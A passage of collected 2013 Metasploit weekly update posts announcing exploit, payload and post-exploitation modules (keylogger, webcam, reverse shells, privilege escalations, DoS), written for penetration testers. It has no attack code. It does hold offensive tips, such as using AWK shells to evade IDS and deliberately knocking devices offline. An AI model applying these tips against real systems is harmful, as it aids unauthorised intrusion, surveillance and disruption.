Meterpreter UpdatesThis is a big week for Meterpreter. For starters, we've landed a new Meterpreter Python payload. Yes, yes, I know, you thought that Metasploit was all Ruby all the time, but this and the Python payloads for bind shells from Spencer McIntyre should help out on advancing the state of Meterpreter by leaps and bounds. Despite Metasploit's massive Ruby footprint, most security developers know Python well enough to scratch their own penetration testing itches in it, so I'm looking forward to a lot of active development here. Plus, since Python is part of the Linux Standard Base, you're quite likely to find it on pretty much any normal Linux distribution, so it should see a lot of use for non-Microsoft targets.In other Meterpreter news, we have a new contributor entering the fray on the Windows 32-bit and 64-bit side by the name of OJ Reeves. His entire mission in life (at least, for now) is to make it much easier for normal humans to compile, test, and extend Meterpreter for Windows platform. If you've been down this hacking Meterpreter path in the past, you know what kind of pit vipers can be lurking in that code, so expect to see some massive improvements there in the next couple weeks.VMWare Setuid Exploit (CVE-2013-1662)This week also sees a new local privilege exploit targeting Linux, the VMWare Setuid vmware-mount Unsafe popen(3) module (aka, vmware-mount.rb). Discovered by Google's Tavis Ormandy and implemented by our own James Egypt Lee, this exploits a setuid vulnerability that takes advantage of a VMWare installation to sneak a root shell. Egypt discusses the Metasploit implementation at length in this blog post, so I encourage you to check it out. Note that this module does not enable attackers to escape from the VMWare guest to the host operating system; it's specifically useful for taking advantage of a VMWare installation to elevate privileges on the host OS itself.More OSX HijinksThe other set of modules I want to hilight is a trio from Rapid7's Joe Vennix: the OSX Capture Userspace Keylogger module, the OSX Manage Record Microphone module, and the OSX Manage Webcam module. As you can probably guess by their titles, these are all post-exploit modules penetration testers can exercise to extend their eyes and ears into the site under test. These kind of Hollywood-hacker style post-exploit tricks are exactly the kind of thing that great to demo to clients to help explain the true risk associated with Apple desktop / laptop bugs, since they are, by their nature, pretty dramatic and fun to use.Tab Assassin Finally, this week, we're going to be pulling the trigger on the great retabbing of Metasploit in order to bring us up to the normal, regular coding standards common to Ruby projects. While I have every expectation this change will be traumatic for long-time contributors, we're faithfully document everything along the way under the shortlink http://r-7.co/MSF-TABS. If you have patches and pull requests that are suddenly thrown into a conflicted state this week, the retabbing from @Tabassassin (pictured right) is probably the root cause. But never fear, just read the fine material regarding the change, and you should be back into an unconflicted state in two shakes.New ModulesWe've got eleven new modules this week. Including the ones mentioned above, we've got another three ZDI-derived exploits (which are always informative), a really nicely commented implementation of the MS13-059 exploit for Internet Explorer, and a pair of Windows post modules that can be used to further extend control over the victim machine. As always, thanks everyone for your contributions!Exploit modulesVMWare Setuid vmware-mount Unsafe popen(3) by egyp7 and Tavis Ormandy exploits CVE-2013-1662SPIP connect Parameter PHP Injection by Arnaud Pachot, Davy Douhine, and Frederic Cikala exploits OSVDB-83543HP LoadRunner lrFileIOService ActiveX Remote Code Execution by juan vazquez and rgod exploits ZDI-13-182HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution by juan vazquez and Brian Gorenc exploits ZDI-13-207Firefox XMLSerializer Use After Free by juan vazquez and regenrecht exploits ZDI-13-006MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free by sinn3r and corelanc0d3r exploits MS13-059Auxiliary and post modulesOSX Capture Userspace Keylogger by joevOSX Manage Record Microphone by joevOSX Manage Webcam by joevWindows Gather Prefetch File Information by TJ GladWindows Manage Set Port Forwarding With PortProxy by Borja MerinoIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: Apple OSX Privilege Escalation

Sudo password bypass on OSXThis week's update includes a nifty local exploit for OSX, the sudo bug described in CVE-2013-1775. We don't have nearly enough of these Apple desktop exploits, and it's always useful to disabuse the Apple-based cool-kids web app developer crowd of the…

Sudo password bypass on OSXThis week's update includes a nifty local exploit for OSX, the sudo bug described in CVE-2013-1775. We don't have nearly enough of these Apple desktop exploits, and it's always useful to disabuse the Apple-based cool-kids web app developer crowd of the notion that their computing platform of choice is bulletproof.Joe Vennix, the principle author of this module, is, in fact, of that very same Apple-based developer crowd, and usually busies himself on cranking out features for Metasploit Pro. But, he's been hanging out with the wrong crowd -- the exploit devs here at Rapid7 -- so over the weekend, he put together this implementation of Todd C. Miller's and Marco Schoepl's sudo time-changing bug. Turns out, OSX allows regular users to adjust the system time. This, in turn, creates the opportunity to promote and escalate the privileges of a compromised user account to root without having to know that user's password, assuming the victim user has used sudo at least once before (which is often the case for local OSX users).Pretty neat trick. For more details on why this works, see the oss-sec post from early this year. Thanks Joe!Housekeeping!So, I don't know if you noticed, but over the last couple weeks, we've managed to hack and slash our way through a great big pile of Metasploit Framework bugs. First off, we just came off a Rapid7 push to shore up the continuous integration test infrastructure -- you can peek in on that at Travis-CI, and see that we juiced up the number of automated tests from about 980 to (as of now) 1,437 automatic tests that run with every build. Pretty much everyone here in the Rapid7 Metasploit hideout helped out with that, and so today, we have a really solid foundation for you, the community contributor, to start putting together useful regression testing on your favorite chunk of Metasploit.In addition, our own Wei @sinn3r Chen took up the cause of cleaning up a bunch of existing modules to conform to our current code standards, opening and resolving about 50 tickets just on his own.The moral of this story is that contributing to Metasploit Framework can be more than what most people think of -- writing exploit modules that exercise vulnerabilities. While that kind of work is probably the most fun and glamorous part of Metasploit, there are a lot of areas that could use automated testing, cleanup, and focused bug hunting. So, if you're more of a general Ruby hacker and not so much a security-focused hacker, that's totally okay by me. Feel free to jump in and fire off pull requests in our direction that provide repeatable testing for core Metasploit functionality, and you'll have a direct impact on improving the state of the art of open source security.New ModulesWe've got three new exploits this week. A little less than usual, but man did we clean up a bunch of older modules. Twenty four in all were touched for this release.Mac OS X Sudo Password Bypass by juan vazquez, Todd C. Miller, and joev exploits CVE-2013-1775Graphite Web Unsafe Pickle Handling by Charlie Eriksen exploits CVE-2013-5093Oracle Endeca Server Remote Command Execution by juan vazquez and rgod exploits ZDI-13-190If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: Cooperative Disclosure and Assessing Joomla

Cooperative DisclosureI'm in attendance this year at Rapid7's UNITED Security Summit, and the conversations I'm finding myself in are tending to revolve around vulnerability disclosure. While Metasploit doesn't traffic in zero-day vulnerabilities every day, it happens often enough that we have a disclosure policy that…

Cooperative DisclosureI'm in attendance this year at Rapid7's UNITED Security Summit, and the conversations I'm finding myself in are tending to revolve around vulnerability disclosure. While Metasploit doesn't traffic in zero-day vulnerabilities every day, it happens often enough that we have a disclosure policy that we stick to when we get a hold of newly uncovered vulnerabilities.What's not talked about in that disclosure policy is the Metasploit exploit dev community's willingness to help you, the unaffiliated researcher, to build out Metasploit modules that exercise your new awesome bug. While the usual procedure is to put together your module and send us a Pull Request, if you're dealing in undisclosed vulns, you probably don't want to spill the beans before your disclosure is public and the vendor has had a chance to react.In those cases, a little more private tutelage might be the thing for you. This week, Juan Vazuquez did just that with contributor Charlie Eriksen and his shiny new Graphite vulnerability. It's pretty easy to put together a private git repo, work out whatever bugs, cleanup, and style tips that are necessary for your module to hit the prime time, and then land it to the main Metasploit distribution once the disclosure parts are done.Expressing a new vulnerability as a Metasploit module is more than mere fame and fortune for the exploit dev. Public Metasploit modules are just about the best way today to bring public visibility to your bug. This, in turn, has a nearly magical effect on get patches rolled out or other mitigation in record time, which makes the Internet as a whole a stronger, more resilient, and more useful network.So, if you're sitting on some undisclosed vulnerabilities and you're not super sure how to go about turning them into generally useful Metasploit modules, just ask! Both the Rapid7-employed exploit devs and the larger Metasploit community are always happy to help out with some mano-y-mano module writing, and we're pretty good at keeping new, undisclosed vulns off of Twitter (at least, for a little while).Joomla Bug in the WildSpeaking of patching, late last week, Metasploit exploit developer Juan Vazquez wrote up the latest Joomla bug as part of putting together a module to exploit it. I won't rehash it all here, but if you're of the Joomla persuasion, this will hopefully be another example of a public Metasploit module spurring along your own scanning and patching process.If you run an enterprise IT shop, you know that Joomla is one of those technologies that has a tendency to pop up in your environment, even if it's not on your explicit whitelist of approved technologies. It's pretty easy to set up and use, so you might be surprised to find it humming along in your environment as people (with all the best intentions!) fire up an instance to run their local knowledge base or internal blog or whatever. And, since those folks aren't running sanctioned and blessed IT-approved software, who knows if they'be been keeping up on their patches. So, along with this latest module, it might be a good time to break out the old Joomla Version scanner module to tally up what's running.New ModulesWe've got ten new modules this week, including the new Joomla module mentioned above. Enjoy!Exploit modulesJava storeImageArray() Invalid Array Indexing Vulnerability by sinn3r, juan vazquez, and Unknown exploits CVE-2013-2465Joomla Media Manager File Upload Vulnerability by juan vazquez and Jens Hinrichsen exploits OSVDB-95933Chasys Draw IES Buffer Overflow by juan vazquez, Christopher Gabriel, Javier 'soez', and Longinos Recuero Bustos exploits CVE-2013-3928Cogent DataHub HTTP Server Buffer Overflow by juan vazquez and rgod exploits ZDI-13-178Intrasrv 1.0 Buffer Overflow by PsychoSpy and xis_one exploits OSVDB-94097MiniWeb (Build 300) Arbitrary File Upload by AkaStep and Brendan Coles exploits OSVDB-92200Ultra Mini HTTPD Stack Buffer Overflow by PsychoSpy and superkojiman exploits CVE-2013-5019Auxiliary and post modulesNexpose XXE Arbitrary File Read by Bojan Zdrnja, Brandon Perry, and Drazen PopovicCisco Ironport Bruteforce Login Utility by Karn GaneshenOSX Password Prompt Spoof by Joff Thyer and joevAvailabilityIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: Metasploit Pro on Chromebook, Galaxy Tab, and a Batch of New ZDI Exploits

Vegas Time!Like the rest of the information security industry, we're buttoning down for the annual pilgramage to Vegas next week. This means collecting up all our new community-sourced swag, finishing up training and presentation material, figuring out what the heck to do with our…

Vegas Time!Like the rest of the information security industry, we're buttoning down for the annual pilgramage to Vegas next week. This means collecting up all our new community-sourced swag, finishing up training and presentation material, figuring out what the heck to do with our phones to avoid casual ownage, and test driving our new Chromebook builds of Metasploit Pro. They're pretty sweet. The latest update for ARM-arch Kali should run without a problem on a SD Card-installed Chromebook alternate OS, as seen here:This just in: Metasploit Pro is known to successfully pop shells from a Galaxy Tab, as well -- this photo courtesy of Mati "muts" Aharoni of Offensive Security:While the technical work is impressive by itself, the decals that Lance @lsanchez-r7 Sanchez cooked up pretty much steal the show:Yeah, we're pretty pleased with these. (:As far as confirmed meatspace appearances from the Rapid7 Metasploit contingent, nex and rep are presenting at  BlackHat about Cuckoo Sandbox,  todb will be speaking at BSidesLV Common Ground with Thomas d'Otreppe about the vices and virtues of open source security, and of course Egypt will be delivering in-depth Metasploit training at BlackHat.So, be careful out there, stay safe (infosec-wise, if not health-wise), swing by our BlackHat Booth #517 for some awesome Metasploit 10-year anniversary T-shirts, and let's see what we can do to advance the state of the art of open source security for another year or ten.New ModulesWe've got seven new modules with this week's update. As you can see below, this week is pretty heavy on the ZDI-reversed exploits. We've got ZDI-13-352 for HP products, a couple vectors for ZDI-13-110 for Apple Quicktime, and ZDI-13-147 for VMWare.Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment by Ramon de C Valle exploits CVE-2013-2113D-Link Devices UPnP SOAP Command Execution by juan vazquez and Michael Messner exploits OSVDB-94924Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection by Ramon de C Valle exploits CVE-2013-2121Apple Quicktime 7 Invalid Atom Length Buffer Overflow by sinn3r, Jason Kratzer, Paul Bates, and Tom Gallagher exploits ZDI-13-110Apple Quicktime 7 Invalid Atom Length Buffer Overflow by sinn3r, Jason Kratzer, Paul Bates, and Tom Gallagher exploits ZDI-13-110HP Managed Printing Administration jobAcct Remote Command Execution by juan vazquez and Andrea Micalizzi exploits ZDI-11-352VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload by juan vazquez and Andrea Micalizzi exploits ZDI-13-147AvailabilityIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Metasploit Update: Those Sneaky IPMI Devices

IPMI, in my network?This week's update features a set of tools for auditing your IPMI infrastructure. "Phew, I'm glad I'm not one of those suckers," you might be thinking to yourself. Well, the thing about IPMI (aka, the Intelligent Platform Management Interface) is that…

IPMI, in my network?This week's update features a set of tools for auditing your IPMI infrastructure. "Phew, I'm glad I'm not one of those suckers," you might be thinking to yourself. Well, the thing about IPMI (aka, the Intelligent Platform Management Interface) is that it's just a skootch more esoteric than most protocols, and even experienced server administrators may not be aware of it. Do you use server hardware from IBM, Dell, or HP? Have you ever had to use IBM's Remote Supervisor adapters, Dell's DRAC cards, or HP's iLO kit? If so, congrats! Chances are extremely good that you're running IPMI, and so you should really take a second to take a look at HD's and Dan Farmer's IPMI material.In addition to the IPMI modules, we also have a bonus utility shipping this week, expertly snuck into the tools/ directory. Turns out, most (all?) offline password crackers don't do such a great job at cracking salted SHA1s in many cases. This was problematic for IPMI auditing, so HD whipped up out hmac_sha1_crack.rb. In fact, if you weren't aware of the tools/ directory, take a look. There's a lot in there that can help not only exploit development, but are useful for all sorts of specialized security tasks that you might not normally think of using Metasploit for.Back to IPMI. Obviously, this vector is most relevant for the insider threat; sensible network management means that these IPMI devices won't be talking to your waiting room, your call center, or your parking lot over WiFi. If you've spent any time at all in the penetration testing world, though, you know it's really easy to screw those boundaries up, so it's worth it to audit your networks -- all of them -- for protocol endpoints that sneak through unexpectedly. And hey, there are some BOFHs out there that will go to great lengths to route traffic over VPN (or the Internet) so they can remote manage their machines from home or their phone. I've known a few of those guys. I might have even been one of those guys in a past life. (:Redmine refreshAlso this week, we've done some housekeeping on our Redmine bug tracker. While none of the updates should be really noticeable by you, my beloved public bug filers and feature requestors, please do pipe up on the #metasploit Freenode IRC channel or mailing lists if you see something that doesn't seem right to you. Thanks to Kernelsmith for first noticing and reporting the problem with the Redmine wiki, and HD for untangling the somewhat labyrinthine dependencies that have grown around this server over time.Oh, and incidentally, avoid using Redmine wiki; virtually everything of import has been moved to either the Metasploit Community (you're soaking in it!), or, for developer docs, GitHub.  We need to start putting in helpful redirects from the old wiki for the stragglers and identifying what's left to convert. If you'd like to help, feel free to volunteer, we can always use more motivated hands!New modulesWe've got six new modules this week, including the IPMI material. Go to town on your network before someone else does.IPMI 2.0 RAKP Cipher Zero Authentication Bypass Scanner by hdm and Dan Farmer exploits OSVDB-93040IPMI 2.0 RAKP Remote SHA1 Password Hash Retreival by hdm and Dan FarmerIPMI Information Discovery by hdm and Dan FarmerInstantCMS 1.6 Remote PHP Code Execution by juan vazquez, AkaStep, and Ricardo Jorge Borges de Almeida exploits BID-60816ABBS Audio Media Player .LST Buffer Overflow by Julian Ahrens and modpr0be exploits OSVDB-75096ERS Viewer 2013 ERS File Handling Buffer Overflow by juan vazquez and James Fitts exploits CVE-2013-3482AvailabilityIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Metasploit Update: Weaponizing Local Exploits

Weaponizing Local ExploitsThis week's update features an exploit for Tavis @taviso Ormandy's vulnerability in the EPATHOBJ::pprFlattenRec function, which lives in win32k.sys on pretty much any Windows machine you're likely to run into. A whole lot of people threw in on this module to…

Weaponizing Local ExploitsThis week's update features an exploit for Tavis @taviso Ormandy's vulnerability in the EPATHOBJ::pprFlattenRec function, which lives in win32k.sys on pretty much any Windows machine you're likely to run into. A whole lot of people threw in on this module to make this exploit reliable in Metasploit -- Tavis and progmboy wrote the original C exploit, new contributor @Keebie4e ported it to a Metasploit module, then a whole bunch of people threw in (and continue to do so) to make this exploit more and more stable. You can follow along at home by scrolling through PR #2036. I don't usually point at specific pull requests, but this one offers a pretty neat glimpse into how vulns become modules around here. If you're interested in exploit development, these are the kinds of discussions that are invaluable to follow along with.Oh, and incidentally, there's no patch yet for this particular issue, so it's effectively 0-day. While it's "only" a privilege escalation, penetration testers pretty routinely need some way to elevate from a local user privilege level to local system (and from there, it's but a hop skip and jump away from Domain Administrator, thanks to the miracle of Mimikatz credential dumping.Further, consider the power of an exploit like this when combine with, say, the latest Java Exploit from Adam Gowdiak and Matthias Kasier. What this means is that any malicious web server out on the Internet has a pretty straight shot at a whole lot of internal Windows networks.That's pretty bad. Many, many domain administrators are now at the mercy of the next (secret, unpublished) client-side exploit. Hopefully, with the publication of this vulnerability, defenders (and Microsoft) will come up with a decent solution sooner rather than later. In the meantime, it seems like offensive security has the upper hand at the moment. Now might be a good time to check your defense in depth strategies...New ModulesWe've got five new modules this week, including the two referenced above. What can I say, the security community tends to get a little quiet in early July, as everyone finalizes their Bsides / BlackHat / DefCon material.SMTP Open Relay Detection by Campbell MurrayJava Applet ProviderSkeleton Insecure Invoke Method by Adam Gowdiak and Matthias Kaiser exploits CVE-2013-2460Carberp Web Panel C2 Backdoor Remote PHP Code Execution by Steven K, bwall(Brian Wallace), and connection(Luis Santana)Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation by sinn3r, juan vazquez, egyp7, Keebie4e, Meatballs, Tavis Ormandy, and progmboy exploits CVE-2013-3660Windows Manage Trojanize Support Account by salchoAvailabilityIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: Smaller is Better

In this week's episode, the role of Tod Beardsley will be played by egypt.Smaller is betterPerhaps the most prominent addition to the framework this week is not an addition at all, but rather a deletion. We've been working toward a slimmer, more manageable source…

In this week's episode, the role of Tod Beardsley will be played by egypt.Smaller is betterPerhaps the most prominent addition to the framework this week is not an addition at all, but rather a deletion. We've been working toward a slimmer, more manageable source tree for a while now, and as part of that effort, we recently removed a pile of old-and-busted unit tests. This update goes a bit further, moving source code for some compiled payloads into seperate repositories. Metasploit's version of Javapayload (which includes Java and Android Meterpreter) can now be found at rapid7/metasploit-javapayload, the native C meterpreter lives in rapid7/meterpreter, and the excellent packet manipulation library, PacketFu, has been pulled out of the tree in favor of the standalone gem. As so often is the case when anything involving Java arises, thanks again go to mihi for his help with a consolidated java build environment. By my calculations, the framework repository is now somewhere in the neighborhood of 45MB lighter.Less is moreAnother thing that has gotten much smaller is our pull queue, thanks to the tireless efforts of the lovely wvu. Having someone working full-time on ticket husbandry has made many things go more smoothly, and as a result the number of pull requests and unresolved issues has been steadily falling.  Which, of course, means that now is a great time to submit that patch you've been meaning to write!New ModulesThis week brings 6 new modules:Sun Java Web Start Double Quote Injection by Rh0 exploits CVE-2012-1533MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow by juan vazquez, 4B5F5F4B, and Nicolas Joly exploits MS13-037Monkey HTTPD Header Parsing Denial of Service (DoS) by Doug Prostko exploits CVE-2013-3843InfoVista VistaPortal Application Bruteforce Login Utility by Karn GaneshenRFCode Reader Web Interface Login / Bruteforce Utility by Karn GaneshenSAPRouter Port Scanner by Bruno Morisson and nmonkeeAvailabilityIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: Adventures in Unstable, DoS'ing UPnP for Good, and Secret AWK Shells

Stable is for Suckers!Today on the Freenode IRC channel #metasploit, a user was asking about our old SVN repository for "unstable" Metasploit modules. He was lamenting its loss, since we recently shut down our SVN services (described in this blog post on May 22,…

Stable is for Suckers!Today on the Freenode IRC channel #metasploit, a user was asking about our old SVN repository for "unstable" Metasploit modules. He was lamenting its loss, since we recently shut down our SVN services (described in this blog post on May 22, 2013).Fear not, danger-seekers! "Unstable" does live on in the form of a GitHub branch. You can check it out at https://github.com/rapid7/metasploit-framework/tree/unstable, and take a look at the unstable-modules directory. Most of the modules in there ran into some kind of trouble in testing or are too unreliable to package up and ship in Metasploit proper. But who knows? Opening up the unstable-modules directory is like buying a mystery box at auction, so you might find a lost treasure, or a mass of half-rotten comicbooks. If you're interested in that sort of thing, just be sure to check the history of the module in question to understand what all happened with it. This is usually pretty easy by reading the commit history and contacting the original author.Another source for interesting-but-unshipped modules is Rob @mubix Fuller's Q Repository. Oftentimes, things that don't quite fit with the Metasploit main distro will end up here. I am totally on board with someone other than Rapid7 maintaining alternate streams of free, open source, unencumbered Metasploit modules. After all, why should we have all the fun spreading open source cheer around the Internet?If you're after these modules for reasons beyond mere intellectual curiosity -- like, you actually want to use them -- all you need to do is create a directory structure like $HOME/.msf4/modules/auxiliary/test (or exploits/test, post/test, etc), and drop them in. You can change the name "test" to whatever you like, but you must declare what sort of module it is in the path. When you run msfconsole, those modules will be scooped up, and ready to use. Naturally, your mileage may vary, and there is certainly no guarantee that these modules are safe and appropriate for your network, but hey, stable is for suckers!Heavy-handed UPnP MitigationHey, remember that time HD Moore talked about all the zillions of UPnP devices that have broken implementations and vulnerable to remote exploitation? Yeah, that was pretty fun. Of course, it's less funny if you are responsible for some of these devices in your network. Is the ownership of these devices in your network unclear? Are they business critical, or not? Sometimes, it's hard to tell.In my more Lawful Evil moments, it occurs to me that pretty much the fastest way to ferret out ownership of a device is to kick it offline and then find out who squawks. To that end, we have a Denial of Service module that kicks MiniUPnP 1.0 devices offline by exercising CVE-2013-0229, thanks to community contributor Dejan Lukan's implementation of HD's vulnerability discovery.DoSes certainly can attract attention to a problem implementation. If the device is important enough to keep online, it's probably important enough to protect through some mind of mitigating strategy. Should you really DoS critical industrial control equipment that happens to have a single-packet kill vulnerability? Maybe the better question to ask is, "Is it better to wait for a bad guy to knock this industrial control gear offline on his schedule, or should I do it on my schedule?" Something to think about, anyway.GNU AWK Bind and Reverse ShellsOnce upon a time, the advice to system administrators hardening DMZ-based servers was to yank useful developer tools from those machines, since post-compromise, an attacker could use them to extend control. What this meant, at the time, was that you wouldn't want to have gcc or some other compiler installed on your web server, because you don't want to allow attackers to compile shells and backdoors and stuff like that locally. You'd also want to remove (or at least limit) interpreters like Perl or Python, for largely the same reasons.I'm not entirely convinced that this is realistic advice; it would be difficult for a system administrator to perform job functions without some kind of programming help. And in this day and age of DevOps, where configuration management is increasingly the job of interpreted languages, the benefits of stripping system tools off a server may just not stack up to the cost of not having them there when you need them legitimately.That all said, if you happen to run into a CentOS / RedHat based system that is configured by a paranoid, you might want to check if GNU awk is installed (as it is by default). If so, you could leverage this particular flavor of awk and use its built-in socket capabilities to open either a bind shell or reverse shell, thanks to the two new payloads provided by community contributors Roberto Soares and Ulisses Castro. It's at the very least novel, and may avoid IPS/IDS string checkers that are looking for the more traditional Perl and bash-based sockets. And hey, is there really a good reason why I need to be able to bind to a socket with just awk?New ModulesWe've got seven new Metasploit modules this week, not counting the aforementioned AWK payloads. Enjoy!Exim and Dovecot Insecure Configuration Command Injection by juan vazquez, Unknown, and eKKiM exploits OSVDB-93004Java Applet Driver Manager Privileged toString() Remote Code Execution by juan vazquez and James Forshaw exploits ZDI-13-076Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow by sinn3r and h1ch4m exploits OSVDB-93754Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability by Andrea Micalizzi (aka rgod) and steponequit exploits ZDI-13-087MiniUPnPd 1.4 Denial of Service (DoS) Exploit by hdm and Dejan Lukan exploits CVE-2013-0229Novell Zenworks Mobile Device Managment Admin Credentials by Andrea Micalizzi (aka rgod) and steponequit exploits CVE-2013-1081SevOne Network Performance Management Application Brute Force Login Utility by Karn GaneshenAvailabilityIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: Apache Struts Exploit, Android Meterpreter, and New Payloads

Apache Struts ExploitThis week's update includes an exploit for a pretty recent vulnerability in Apache Struts, thanks to community contributor Richard @Console Hicks. The struts_include_param module exercises the vulnerability described at OSVDB 93645, disclosed on May 23, 2013, a bare two weeks ago,…

Apache Struts ExploitThis week's update includes an exploit for a pretty recent vulnerability in Apache Struts, thanks to community contributor Richard @Console Hicks. The struts_include_param module exercises the vulnerability described at OSVDB 93645, disclosed on May 23, 2013, a bare two weeks ago, and originally discovered by Eric Kobrin and Douglad Rodrigues.The reason why I bring this up is not just because it's a solid exploit for a recent vulnerability (it is), but also because it illustrates, to a small extent, the Metasploit philosophy of disclosing working, tested exploits pretty much as soon as vulnerabilities are made public.If you are bothered by this stance, then maybe it's time to drag out a dusty old security meme: Defense in Depth. I know for sure there are IT operations folks out there who believe that there is absolutely nothing they can do in the face of zero-day vulnerabilities. This is a horrible, horrible place to be. The fact is, there are volumes and volumes written on defense in depth: you can segment your network, instrument your servers, keep an eye on egress rules, and generally make life a huge hassle for would-be attackers armed with zero (or 14, or 30) day vulnerabilities that you haven't patched against yet.I'm heartened that Google appears to have taken a similiar stance on this, with their announced policy of disclosing active, in-the-wild exploits in the interest of public safety. An Internet giant like Google taking an anti-secrecy stance like this is pretty powerful, and I'm looking forward to the next few weeks of vulnerability disclosures from them.Android MeterpreterOnce, a few weeks back, a fellow named timwr popped into the Metasploit IRC channel on Freenode and complained, rather rudely I might add, "How come there's no Android Meterpreter?" Egypt immediately responded with something along the lines of, "because you haven't written it yet." That, my friends, is how new ports of Meterpreter are made.Timwr, mihi, and Egypt got together over the next several weeks, and as of May 28 or so, we now have a pretty decent Meterpreter app for Android. Expect a much more whiz-bang blog post on this soon, but in the meantime, it's pretty fun to mess around with it now. We don't have mcuh in the way of Android exploits right now, of course, but that brings me to another topic.New PayloadsThis week's update also includes new payloads for ARM and 64-bit Windows. We've three new payloads, all from community contributor @dcbz32, to create reverse TCP and reverse HTTPS connections, as well as a simple shell payload. Hooray, our ARM support is getting more robust all the time; now if only we could convince people to start writing up decent Android and embedded system exploits...In addition, we also have a 64-bit Windows payload for reverse HTTPS, from community contributor agix. This has been a long standing feature request, because while in most cases, 32-bit payloads work just fine on 64-bit platforms, this isn't the case 100% of the time. While this payload works like a champ on Windows 7 and related platforms, it most notably is not supported for Windows 8 targets. Something funny is going on in Win8-land specifically, and it's proving squirrelly to nail down. So, good job to Microsoft for making post-exploit development a little bit harder on their latest platform (: . If you happen to have expertise in this area, we'd love to get your input on putting something solid together for Win8 reverse HTTPS connections as shellcode; ideally, we can end up with one payload for both 64-bit platforms.New ModulesWe've five new modules this week, including the Apache Struts exploit. Check 'em below.Memcached Remote Denial of Service by Gregory Man exploits CVE-2011-4971Apache Struts includeParams Remote Code Execution by Douglas Rodrigues, Eric Kobrin, and Richard Hicks exploits CVE-2013-1966Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution by juan vazquez and rgod exploits ZDI-13-094Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow by Spencer McIntyre exploits CVE-2013-3563CouchDB Login Utility by espretoAvailabilityIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: The Nginx Exploit and Continuous Testing

Nginx Exploit for CVE-2013-2028 The most exciting element of this week's update is the new exploit for Nginx which exercises the vulnerability described by CVE-2013-2028. The Metasploit module was written by Metasploit community contributors hal and saelo, and exploits Greg McManus's bug across a bunch…

Nginx Exploit for CVE-2013-2028 The most exciting element of this week's update is the new exploit for Nginx which exercises the vulnerability described by CVE-2013-2028. The Metasploit module was written by Metasploit community contributors hal and saelo, and exploits Greg McManus's bug across a bunch of versions on a few pre-compiled Linux targets. We don't often come across remote, server-side stack buffer overflows in popular software, so when we do, it's kind of a big deal. This is a big deal vulnerability, and hopefully, Internet-facing ops guys all over the world have already fallen all over themselves to fix this. And yet, recall Jeff Jarmoc's recent findings on the Rails vulnerability, where this critical, remote code execution vulnerability continues to be exploited the wild, five months after disclosure. Now, apply that to what's likely going to happen with this bug, a mere three weeks out from disclosure. Yeah, it's not pretty. If you're running Nginx, and you haven't applied the patch or the workaround, you are asking for trouble. If you think you've applied the patch or the workaround, or if you don't know if you're running vulnerable version of Nginx or not, you can check your defensive posture with this Metasploit module. Jettisoning old tests The update this week also brings a slightly slimmed down version of Metasploit. Way back when, we shipped a couple hundred "unit tests" to exercise some core functionality. While it's true that these testing scripts used the default 'test/unit' library that ships with Ruby, we have since moved on to more complete, thorough testing using Rspec and running every commit through Travis-CI. Also, these old tests haven't been touched, literally, this 